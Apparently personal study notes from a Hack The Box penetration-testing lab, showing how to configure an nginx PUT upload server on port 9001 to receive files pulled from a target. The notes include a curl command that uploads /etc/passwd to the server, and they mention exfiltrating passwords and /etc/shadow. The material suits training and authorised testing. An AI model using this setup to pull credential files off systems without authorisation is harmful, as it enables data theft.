Both Nginix and Apache generally work for setting up a upload server for file transfer.
Problem is Apache has so many sec. issues since it just executes almost everything with.php
And we could shooto urselves in the foot.
Why do that at all? -
well just using a http server for upload might raise an alarm when sending passwords or /etc/shadow file in plain text
Create Dir to hadnle Upload Files
- Momothechi@htb[/htb]$ sudo mkdir -p /var/www/uploads/SecretUploadDirectory
Change the owner to www-data
- Momothechi@htb[/htb]$ sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
Creating a nginx config file here
/etc/nginx/sites-available/upload.conf
Containing:
server {
listen 9001;location /SecretUploadDirectory/ {root /var/www/uploads;dav_methods PUT;}}
Symlink or Site to the sites-enabled Dir
- Momothechi@htb[/htb]$ sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
Start Nginx
- Momothechi@htb[/htb]$ sudo systemctl restart nginx.service
If error check
- /var/log/nginx/error.log
f.e port 80 already in use
Momothechi@htb[/htb]$ tail -2 /var/log/nginx/error.log
2020/11/17 16:11:56 [emerg] 5679#5679: bind() to 0.0.0.0:
80failed (98: Address already in use)2020/11/17 16:11:56 [emerg] 5679#5679: still could not bind()
workaround
- Momothechi@htb[/htb]$ sudo rm /etc/nginx/sites-enabled/default
Now we can upload files using curl
- Momothechi@htb[/htb]$ curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
And catch them
sudo tail -1 /var/www/uploads/SecretUploadDirectory/users.txt